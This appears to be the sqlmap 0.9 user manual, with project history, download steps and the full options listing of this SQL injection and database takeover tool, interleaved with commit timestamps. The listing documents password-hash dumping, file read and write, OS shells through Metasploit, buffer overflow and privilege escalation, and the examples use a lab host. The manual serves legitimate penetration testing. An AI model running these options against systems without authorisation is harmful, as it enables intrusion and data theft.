<item><bf>March 5</bf>, Bernardo <htmlurl url="http://www.slideshare.net/inquis/sql-injection-not-only-and-11"
name="presents"> for the first time some of the sqlmap recent features and
upcoming enhancements at an international event, <htmlurl
url="http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009"
name="Front Range OWASP Conference 2009"> in Denver, USA. The presentation
is titled <em>SQL injection: Not only AND 1=1</em>.
<item><bf>February 24</bf>, Bernardo is accepted as a <htmlurl
url="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele"
name="speaker"> at <htmlurl url="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-main.html"
name="Black Hat Europe 2009"> with a presentation titled <em>Advanced SQL
injection exploitation to operating system full control</em>.
<item><bf>February 3</bf>, sqlmap <bf>0.6.4</bf> is the last point release
for 0.6: taking advantage of the stacked queries test implemented in 0.6.3,
sqlmap can now be used to execute any arbitrary SQL statement, not only
<em>SELECT</em> anymore. Also, many features have been stabilized, tweaked
and improved in terms of speed in this release.
<item><bf>January 9</bf>, Bernardo <htmlurl url="http://www.slideshare.net/inquis/sql-injection-exploitation-internals-presentation"
name="presents"> <em>SQL injection exploitation internals</em> at a
private event in London, UK.
</itemize>
2011-02-27 15:19:32 +03:00
<sect1>2008
2010-05-06 15:09:03 +04:00
<p>
<itemize>
<item><bf>December 18</bf>, sqlmap <bf>0.6.3</bf> is released featuring
support to retrieve targets from Burp and WebScarab proxies log files,
support to test for stacked queries ant time-based blind SQL injection,
rough fingerprint of the web server and web application technologies in
use and more options to customize the HTTP requests and enumerate more
information from the database.
<item><bf>November 2</bf>, sqlmap version <bf>0.6.2</bf> is a "bug fixes"
release only.
<item><bf>October 20</bf>, sqlmap first point release, <bf>0.6.1</bf>, goes
public. This includes minor bug fixes and the first contact between the
tool and <htmlurl url="http://metasploit.com/framework" name="Metasploit">:
an auxiliary module to launch sqlmap from within Metasploit Framework.
The <htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/"
2011-02-27 15:19:32 +03:00
name="subversion development repository"> goes public again.
2010-05-06 15:09:03 +04:00
<item><bf>September 1</bf>, nearly one year after the previous release,
sqlmap <bf>0.6</bf> comes to life featuring a complete code
refactoring, support to execute arbitrary SQL <em>SELECT</em> statements,
more options to enumerate and dump specific information are added, brand
new installation packages for Debian, Red Hat, Windows and much more.
<item><bf>August</bf>, two public <htmlurl name="mailing lists"
url="http://sqlmap.sourceforge.net/#ml"> are created on SourceForge.
2011-02-27 15:19:32 +03:00
<item><bf>January</bf>, sqlmap subversion development repository is moved
2010-05-06 15:09:03 +04:00
away from SourceForge and goes private for a while.
</itemize>
2011-02-27 15:19:32 +03:00
<sect1>2007
2010-05-06 15:09:03 +04:00
<p>
<itemize>
<item><bf>November 4</bf>, release <bf>0.5</bf> marks the end of the OWASP
Spring of Code 2007 contest participation. Bernardo has <htmlurl
url="http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page"
2010-05-13 02:02:18 +04:00
name="accomplished"> all the propsed objects which include also initial
support for Oracle, enhanced support for UNION query SQL injection and
support to test and exploit SQL injections in HTTP Cookie and User-Agent
headers.
2010-05-06 15:09:03 +04:00
<item><bf>June 15</bf>, Bernardo releases version <bf>0.4</bf> as a
result of the first OWASP Spring of Code 2007 milestone. This release
features, amongst others, improvements to the DBMS fingerprint engine,
support to calculate the estimated time of arrival, options to enumerate
specific data from the database server and brand new logging system.
<item><bf>April</bf>, even though sqlmap was <bf>not</bf> and is <bf>not</bf>
an OWASP project, it gets <htmlurl url="http://www.owasp.org/index.php/SpoC_007_-_SqlMap"
name="accepted">, amongst many other open source projects to OWASP Spring
of Code 2007.
<item><bf>March 30</bf>, Bernardo applies to OWASP <htmlurl
url="http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap"
name="Spring of Code 2007">.
<item><bf>January 20</bf>, sqlmap version <bf>0.3</bf> is released,
featuring initial support for Microsoft SQL Server, support to test
and exploit UNION query SQL injections and injection points in POST
parameters.
</itemize>
2011-02-27 15:19:32 +03:00
<sect1>2006
2010-05-06 15:09:03 +04:00
<p>
<itemize>
<item><bf>December 13</bf>, Bernardo releases version <bf>0.2</bf> with
major enhancements to the DBMS fingerprint functionalities and replacement
of the old inference algorithm with the bisection algorithm.
<item><bf>September</bf>, Daniele leaves the project, <htmlurl
url="http://bernardodamele.blogspot.com" name="Bernardo Damele A. G.">
takes it over.
<item><bf>August</bf>, Daniele adds initial support for PostgreSQL and releases
version <bf>0.1</bf>.
<item><bf>July 25</bf>, <htmlurl url="http://dbellucci.blogspot.com" name="Daniele Bellucci">
registers the sqlmap project on SourceForge and develops it on the
<htmlurl url="http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/"
2011-02-27 15:19:32 +03:00
name="SourceForge subversion repository">. The skeleton is implemented and
2010-05-06 15:09:03 +04:00
limited support for MySQL added.
</itemize>
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect>Download and update
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
sqlmap can be downloaded from its
<htmlurl url="http://sourceforge.net/projects/sqlmap/files/" name="SourceForge File List page">.
It is available in two formats:
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<itemize>
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz"
name="Source gzip compressed">.
2009-04-22 15:48:07 +04:00
2011-02-20 00:08:18 +03:00
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.zip"
name="Source zip compressed">.
</itemize>
2009-04-22 15:48:07 +04:00
<p>
2011-02-20 00:08:18 +03:00
You can also checkout the latest development version from the
2011-02-27 15:19:32 +03:00
<htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/" name="subversion">
2011-02-20 00:08:18 +03:00
repository:
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
<tscreen><verb>
$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
</verb></tscreen>
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
<p>
2011-02-27 15:19:32 +03:00
You can update it at any time to the latest development version by running:
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
<tscreen><verb>
$ python sqlmap.py --update
</verb></tscreen>
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
Or:
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
<tscreen><verb>
$ svn update
</verb></tscreen>
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
<p>
This is strongly recommended <bf>before</bf> reporting any bug to the
<htmlurl url="http://sqlmap.sourceforge.net/#ml" name="mailing list">.
2010-03-05 13:20:45 +03:00
2008-10-15 19:38:22 +04:00
<sect>Usage
<p>
<tscreen><verb>
$ python sqlmap.py -h
2011-02-20 00:08:18 +03:00
sqlmap/0.9 - automatic SQL injection and database takeover tool
2010-03-02 15:07:54 +03:00
http://sqlmap.sourceforge.net
2011-02-20 00:08:18 +03:00
2008-12-04 20:40:03 +03:00
Usage: sqlmap.py [options]
2008-10-15 19:38:22 +04:00
Options:
--version show program's version number and exit
-h, --help show this help message and exit
2011-02-20 00:08:18 +03:00
-v VERBOSE Verbosity level: 0-6 (default 1)
2008-10-15 19:38:22 +04:00
2008-12-04 20:40:03 +03:00
Target:
At least one of these options has to be specified to set the source to
get target urls from.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
-d DIRECT Direct connection to the database
2008-10-15 19:38:22 +04:00
-u URL, --url=URL Target url
2010-03-02 15:07:54 +03:00
-l LIST Parse targets from Burp or WebScarab proxy logs
-r REQUESTFILE Load HTTP request from a file
2008-10-15 19:38:22 +04:00
-g GOOGLEDORK Process Google dork results as target urls
2008-12-04 20:40:03 +03:00
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
2008-10-15 19:38:22 +04:00
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
2010-03-03 16:59:29 +03:00
--cookie-urlencode URL Encode generated cookie injections
2010-03-02 15:07:54 +03:00
--drop-set-cookie Ignore Set-Cookie header from response
2008-10-15 19:38:22 +04:00
--user-agent=AGENT HTTP User-Agent header
2011-02-20 00:08:18 +03:00
--random-agent Use randomly selected HTTP User-Agent header
2010-03-02 15:07:54 +03:00
--referer=REFERER HTTP Referer header
2009-04-22 15:48:07 +04:00
--headers=HEADERS Extra HTTP headers newline separated
2010-03-12 20:43:38 +03:00
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED HTTP authentication credentials (name:password)
--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
2008-10-15 19:38:22 +04:00
--proxy=PROXY Use a HTTP proxy to connect to the target url
2011-02-20 00:08:18 +03:00
--proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
2010-03-03 19:25:03 +03:00
--ignore-proxy Ignore system default HTTP proxy
2008-11-15 15:25:19 +03:00
--delay=DELAY Delay in seconds between each HTTP request
2009-01-19 01:36:48 +03:00
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
2009-04-22 15:48:07 +04:00
--retries=RETRIES Retries when the connection timeouts (default 3)
2010-03-02 15:07:54 +03:00
--scope=SCOPE Regexp to filter targets from provided proxy log
2011-02-20 00:08:18 +03:00
--safe-url=SAFURL Url address to visit frequently during testing
--safe-freq=SAFREQ Test requests between two visits to a given safe url
Optimization:
These options can be used to optimize the performance of sqlmap.
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
2011-03-17 15:37:50 +03:00
--group-concat Use GROUP_CONCAT (MySQL/error) in dumping phase
(experimental)
2008-10-15 19:38:22 +04:00
Injection:
2008-12-12 22:06:31 +03:00
These options can be used to specify which parameters to test for,
2011-02-20 00:08:18 +03:00
provide custom injection payloads and optional tampering scripts.
2008-12-12 22:06:31 +03:00
2008-12-04 20:40:03 +03:00
-p TESTPARAMETER Testable parameter(s)
2008-10-15 19:38:22 +04:00
--dbms=DBMS Force back-end DBMS to this value
2009-04-22 15:48:07 +04:00
--os=OS Force back-end DBMS operating system to this value
2008-12-09 00:24:24 +03:00
--prefix=PREFIX Injection payload prefix string
2011-02-20 00:08:18 +03:00
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Detection:
These options can be used to specify how to parse and compare page
content from HTTP responses when using blind SQL injection technique.
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1)
2008-12-09 00:24:24 +03:00
--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
2011-03-17 15:37:50 +03:00
--text-only Compare pages based only on the textual content
2008-10-15 19:38:22 +04:00
2008-11-15 15:25:19 +03:00
Techniques:
2011-03-17 15:37:50 +03:00
These options can be usedto tweak testing of specific SQL injection
techniques.
2008-11-15 15:25:19 +03:00
2009-04-22 15:48:07 +04:00
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
2011-02-20 00:08:18 +03:00
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
2011-03-17 15:37:50 +03:00
--union-char=UCHAR Character to use for bruteforcing number of columns
2008-11-15 15:25:19 +03:00
2008-10-15 19:38:22 +04:00
Fingerprint:
2008-12-04 20:40:03 +03:00
-f, --fingerprint Perform an extensive DBMS version fingerprint
2008-10-15 19:38:22 +04:00
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
2008-12-21 19:35:45 +03:00
tables. Moreover you can run your own SQL statements.
2008-10-15 19:38:22 +04:00
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
2009-01-19 01:36:48 +03:00
--is-dba Detect if the DBMS current user is DBA
2008-10-15 19:38:22 +04:00
--users Enumerate DBMS users
2010-03-03 21:58:27 +03:00
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
2011-02-20 00:08:18 +03:00
--roles Enumerate DBMS users roles
2008-10-15 19:38:22 +04:00
--dbs Enumerate DBMS databases
2010-03-03 21:58:27 +03:00
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
2008-10-15 19:38:22 +04:00
--dump-all Dump all DBMS databases tables entries
2011-02-20 00:08:18 +03:00
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
2008-10-15 19:38:22 +04:00
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
2009-07-25 18:31:44 +04:00
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
2010-03-02 15:07:54 +03:00
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
2008-12-21 19:35:45 +03:00
--sql-query=QUERY SQL statement to be executed
2008-10-15 19:38:22 +04:00
--sql-shell Prompt for an interactive SQL shell
2011-02-20 00:08:18 +03:00
Brute force:
These options can be used to run brute force checks.
--common-tables Check existence of common tables
--common-columns Check existence of common columns
2010-03-02 15:07:54 +03:00
User-defined function injection:
These options can be used to create custom user-defined functions.
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
2008-10-15 19:38:22 +04:00
File system access:
These options can be used to access the back-end database management
2009-04-22 15:48:07 +04:00
system underlying file system.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to
2008-10-15 19:38:22 +04:00
Operating system access:
2010-03-12 02:54:07 +03:00
These options can be used to access the back-end database management
2009-04-22 15:48:07 +04:00
system underlying operating system.
2008-10-15 19:38:22 +04:00
2009-04-22 15:48:07 +04:00
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
2010-03-13 01:43:35 +03:00
--priv-esc Database process' user privilege escalation
2009-04-22 15:48:07 +04:00
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
2008-10-15 19:38:22 +04:00
2010-03-02 15:07:54 +03:00
Windows registry access:
2010-03-12 02:54:07 +03:00
These options can be used to access the back-end database management
2010-03-02 15:07:54 +03:00
system Windows registry.
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
2011-02-20 00:08:18 +03:00
General:
These options can be used to set some general working parameters.
-t TRAFFICFILE Log all HTTP traffic into a textual file
2011-03-17 15:37:50 +03:00
-s SESSIONFILE Save and resume all data retrieved on a session file
2010-03-04 16:17:11 +03:00
--flush-session Flush session file for current target
2010-03-02 15:07:54 +03:00
--eta Display for each output the estimated time of arrival
2010-03-03 18:16:43 +03:00
--update Update sqlmap
2008-10-15 19:38:22 +04:00
--save Save options on a configuration INI file
2008-10-20 17:43:18 +04:00
--batch Never ask for user input, use the default behaviour
2011-02-20 00:08:18 +03:00
Miscellaneous:
--beep Alert when sql injection found
2011-03-17 15:37:50 +03:00
--check-payload IDS detection testing of injection payloads
2009-04-22 15:48:07 +04:00
--cleanup Clean up the DBMS by sqlmap specific UDF and tables
2011-02-20 00:08:18 +03:00
--forms Parse and test forms on target url
--gpage=GOOGLEPAGE Use google dork results from specified page number
--parse-errors Parse DBMS error messages from response pages
--replicate Replicate dumped data into a sqlite3 database
2008-10-15 19:38:22 +04:00
</verb></tscreen>
2008-12-17 23:58:19 +03:00
<sect1>Output verbosity
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-v</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
This switch can be used to set the verbosity level of output messages.
There exist <bf>seven</bf> levels of verbosity.
2011-02-28 18:23:05 +03:00
The default level is <bf>1</bf> in which information, warning, error and
critical messages and Python tracebacks (if any occur) will be displayed.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<itemize>
2011-02-28 18:23:05 +03:00
<item><bf>0</bf>: Show only Python tracebacks, error and critical messages.
<item><bf>1</bf>: Show also information and warning messages.
<item><bf>2</bf>: Show also debug messages.
<item><bf>3</bf>: Show also payloads injected.
<item><bf>4</bf>: Show also HTTP requests.
<item><bf>5</bf>: Show also HTTP responses' headers.
<item><bf>6</bf>: Show also HTTP responses' page content.
2011-02-20 00:08:18 +03:00
</itemize>
2008-10-15 19:38:22 +04:00
<p>
2011-02-28 18:23:05 +03:00
A reasonable level of verbosity to further understand what sqlmap does
under the hood is level <bf>2</bf>, primarily for the detection phase and
the take-over functionalities. Whereas if you want to see the SQL payloads
the tools sends, level <bf>3</bf> is your best choice.
In order to further debug potential bugs or unexpected behaviours, we
recommend you to set the verbosity to level <bf>4</bf> or above. This
level is recommended to be used when you feed the developers with a bug
report too.
2008-10-15 19:38:22 +04:00
2008-12-17 23:58:19 +03:00
<sect1>Target
<p>
2011-02-27 15:19:32 +03:00
At least one of these options has to be provided.
2008-12-17 23:58:19 +03:00
<sect2>Target URL
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-u</tt> or <tt>-</tt><tt>-url</tt>
2008-12-17 23:58:19 +03:00
<p>
2011-02-27 15:19:32 +03:00
Run sqlmap against a single target URL. This switch requires an argument
2011-02-28 18:23:05 +03:00
which is the target URL in the form <tt>http(s)://targeturl[:port]/[...]</tt>.
2008-12-17 23:58:19 +03:00
2010-03-03 19:25:03 +03:00
<sect2>Parse targets from Burp or WebScarab proxy logs
2008-11-28 01:33:33 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-l</tt>
2008-11-28 01:33:33 +03:00
<p>
2010-03-03 19:25:03 +03:00
Rather than providing a single target URL, it is possible to test and
2011-02-27 15:19:32 +03:00
inject against HTTP requests proxied through <htmlurl url="http://portswigger.net/suite/"
2011-02-20 00:08:18 +03:00
name="Burp proxy"> or <htmlurl
url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"
2011-02-27 15:19:32 +03:00
name="WebScarab proxy"> This switch requires an argument which is the
proxy's HTTP requests log file.
2008-11-28 01:33:33 +03:00
2010-03-02 15:07:54 +03:00
<sect2>Load HTTP request from a file
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-r</tt>
2010-03-03 16:59:29 +03:00
<p>
2011-02-20 00:08:18 +03:00
One of the possibilities of sqlmap is loading of complete HTTP request
2011-02-27 15:19:32 +03:00
from a textual file. That way you can skip usage of bunch of other
2011-02-20 00:08:18 +03:00
options (e.g. setting of cookies, POSTed data, etc).
2010-03-03 16:59:29 +03:00
<p>
2011-02-27 15:19:32 +03:00
Sample content of a HTTP request file provided as argument to this switch:
2010-03-03 16:59:29 +03:00
<tscreen><verb>
POST /sqlmap/mysql/post_int.php HTTP/1.1
2011-02-07 03:55:10 +03:00
Host: 192.168.136.131
2010-03-03 16:59:29 +03:00
User-Agent: Mozilla/4.0
id=1
</verb></tscreen>
2010-03-03 19:25:03 +03:00
<sect2>Process Google dork results as target addresses
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-g</tt>
2008-10-15 19:38:22 +04:00
<p>
2008-12-12 22:06:31 +03:00
It is also possible to test and inject on <tt>GET</tt> parameters on the
results of your Google dork.
2008-10-15 19:38:22 +04:00
2008-12-12 22:06:31 +03:00
<p>
2008-10-15 19:38:22 +04:00
This option makes sqlmap negotiate with the search engine its session
cookie to be able to perform a search, then sqlmap will retrieve Google
2011-02-20 00:08:18 +03:00
first 100 results for the Google dork expression with <tt>GET</tt>
parameters asking you if you want to test and inject on each possible
affected URL.
2008-10-15 19:38:22 +04:00
2008-12-04 20:40:03 +03:00
<sect2>Load options from a configuration INI file
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-c</tt>
2008-10-15 19:38:22 +04:00
<p>
2008-12-04 20:40:03 +03:00
It is possible to pass user's options from a configuration INI file, an
example is <tt>sqlmap.conf</tt>.
2008-10-15 19:38:22 +04:00
<p>
2008-12-04 20:40:03 +03:00
Note that if you also provide other options from command line, those are
2011-02-27 15:19:32 +03:00
evaluated when running sqlmap and overwrite those provided in the
configuration file.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect1>Request
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<p>
These options can be used to specify how to connect to the target url.
2011-02-27 15:19:32 +03:00
<sect2>HTTP data
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Option: <tt>-</tt><tt>-data</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
By default the HTTP method used to perform HTTP requests is <tt>GET</tt>,
but you can implicitly change it to <tt>POST</tt> by providing the data to
be sent in the <tt>POST</tt> requests. Such data, being those parameters,
2011-02-27 15:19:32 +03:00
are tested for SQL injection as well as any provided <tt>GET</tt>
parameters.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect2>HTTP <tt>Cookie</tt> header
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-cookie</tt>, <tt>-</tt><tt>-drop-set-cookie</tt>
and <tt>-</tt><tt>-cookie-urlencode</tt>
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<p>
2011-02-27 15:19:32 +03:00
This feature can be useful in two ways:
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<itemize>
<item>The web application requires authentication based upon cookies and
you have such data.
<item>You want to detect and exploit SQL injection on such header values.
</itemize>
<p>
Either reason brings you to need to send cookies with sqlmap requests, the
2011-02-27 15:19:32 +03:00
steps to go through are the following:
2011-02-20 00:08:18 +03:00
<itemize>
2011-02-27 15:19:32 +03:00
<item>Login to the application with your favourite browser.
<item>Get the HTTP Cookie from the browser's preferences or from the HTTP
proxy screen and copy to the clipboard.
<item>Go back to your shell and run sqlmap by pasting your clipboard as
2011-02-20 00:08:18 +03:00
the argument of the <tt>-</tt><tt>-cookie</tt> switch.
</itemize>
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Note that the HTTP <tt>Cookie</tt> header values are usually separated by
a <tt>;</tt> character, <bf>not</bf> by an <tt>&</tt>. sqlmap can
recognize these as separate sets of <tt>parameter=value</tt> too, as well
as GET and POST parameters.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
If at any time during the communication, the web application responds with
<tt>Set-Cookie</tt> headers, sqlmap will automatically use its value in
2011-02-20 00:08:18 +03:00
all further HTTP requests as the <tt>Cookie</tt> header. sqlmap will also
2011-02-27 15:19:32 +03:00
automatically test those values for SQL injection. This can be avoided by
providing the switch <tt>-</tt><tt>-drop-set-cookie</tt> - sqlmap will
2011-02-20 00:08:18 +03:00
ignore any coming <tt>Set-Cookie</tt> header.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<p>
Vice versa, if you provide a HTTP <tt>Cookie</tt> header with
2011-02-27 15:19:32 +03:00
<tt>-</tt><tt>-cookie</tt> switch and the target URL sends an HTTP
<tt>Set-Cookie</tt> header at any time, sqlmap will ask you which set of
cookies to use for the following HTTP requests.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
sqlmap by default does <bf>not</bf> URL-encode generated cookie payloads,
2011-02-20 00:08:18 +03:00
but you can force it by using the <tt>-</tt><tt>-cookie-urlencode</tt>
2011-02-27 15:19:32 +03:00
switch. Cookie content encoding is not declared by HTTP protocol standard
in any way, so it is solely the matter of web application's behaviour.
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Note that also the HTTP <tt>Cookie</tt> header is tested against SQL
2011-02-27 15:19:32 +03:00
injection if the <tt>-</tt><tt>-level</tt> is set to <bf>2</bf> or above.
Read below for details.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect2>HTTP <tt>User-Agent</tt> header
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-user-agent</tt> and <tt>-</tt><tt>-random-agent</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
By default sqlmap performs HTTP requests with the following <tt>User-Agent</tt>
header value:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-20 00:08:18 +03:00
sqlmap/0.9 (http://sqlmap.sourceforge.net)
2008-10-15 19:38:22 +04:00
</verb></tscreen>
<p>
2011-02-20 00:08:18 +03:00
However, it is possible to fake it with the <tt>-</tt><tt>-user-agent</tt>
2011-02-27 15:19:32 +03:00
switch by providing custom User-Agent as the switch argument.
2011-02-20 00:08:18 +03:00
<p>
2011-02-27 15:19:32 +03:00
Moreover, by providing the <tt>-</tt><tt>-random-agent</tt> switch, sqlmap
will randomly select a <tt>User-Agent</tt> from the <tt>./txt/user-agents.txt</tt>
textual file and use it for all HTTP requests within the session.
2008-10-15 19:38:22 +04:00
2008-11-15 15:25:19 +03:00
<p>
Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
2011-02-27 15:19:32 +03:00
not provided, its value is not expected or is blacklisted by a web
2008-11-15 15:25:19 +03:00
application firewall or similar intrusion prevention system. In this case
sqlmap will show you a message as follows:
<tscreen><verb>
2011-02-27 15:19:32 +03:00
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to
force the HTTP User-Agent header with option --user-agent or --random-agent
2008-11-15 15:25:19 +03:00
</verb></tscreen>
2011-02-20 00:08:18 +03:00
<p>
Note that also the HTTP <tt>User-Agent</tt> header is tested against SQL
2011-02-27 15:19:32 +03:00
injection if the <tt>-</tt><tt>-level</tt> is set to <bf>3</bf> or above.
Read below for details.
2011-02-20 00:08:18 +03:00
2008-10-15 19:38:22 +04:00
2010-03-02 15:07:54 +03:00
<sect2>HTTP <tt>Referer</tt> header
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-referer</tt>
2010-03-02 15:07:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to fake the HTTP <tt>Referer</tt> header value. By default
<bf>no</bf> HTTP <tt>Referer</tt> header is sent in HTTP requests if not
explicitly set.
2010-03-02 15:07:54 +03:00
<p>
2011-02-20 00:08:18 +03:00
Note that also the HTTP <tt>Referer</tt> header is tested against SQL
2011-02-27 15:19:32 +03:00
injection if the <tt>-</tt><tt>-level</tt> is set to <bf>3</bf> or above.
Read below for details.
2010-03-02 15:07:54 +03:00
2008-12-12 22:06:31 +03:00
<sect2>Extra HTTP headers
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-headers</tt>
2008-12-12 22:06:31 +03:00
<p>
2011-02-20 00:08:18 +03:00
It is possible to provide extra HTTP headers by setting the
<tt>-</tt><tt>-headers</tt> switch. Each header must be separated by a
newline and it is much easier to provide them from the configuration INI
file. Have a look at the sample <tt>sqlmap.conf</tt> file for an example.
2008-12-12 22:06:31 +03:00
2011-02-27 15:19:32 +03:00
<sect2>HTTP protocol authentication
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-auth-type</tt> and <tt>-</tt><tt>-auth-cred</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
These options can be used to specify which HTTP protocol authentication
the web server implements and the valid credentials to be used to perform
all HTTP requests to the target application.
The three supported HTTP protocol authentication mechanisms are:
<itemize>
<item><tt>Basic</tt>
<item><tt>Digest</tt>
<item><tt>NTLM</tt>
</itemize>
While the credentials' syntax is <tt>username:password</tt>.
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Example of valid syntax:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-07 03:55:10 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
2011-02-20 00:08:18 +03:00
--auth-type Basic --auth-cred "testuser:testpass"
</verb></tscreen>
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>HTTP protocol certificate authentication
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<p>
Switch: <tt>-</tt><tt>-auth-cert</tt>
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<p>
This switch should be used in cases when the web server requires proper
client-side certificate for authentication. Supplied values should be in
the form: <tt>key_file,cert_file</tt>, where <tt>key_file</tt> should be
the name of a PEM formatted file that contains your private key, while
<tt>cert_file</tt> should be the name for a PEM formatted certificate
chain file.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect2>HTTP(S) proxy
2010-03-02 15:07:54 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-proxy</tt>, <tt>-</tt><tt>-proxy-cred</tt> and <tt>-</tt><tt>-ignore-proxy</tt>
2010-03-03 16:59:29 +03:00
2011-02-20 00:08:18 +03:00
<p>
2011-02-27 15:19:32 +03:00
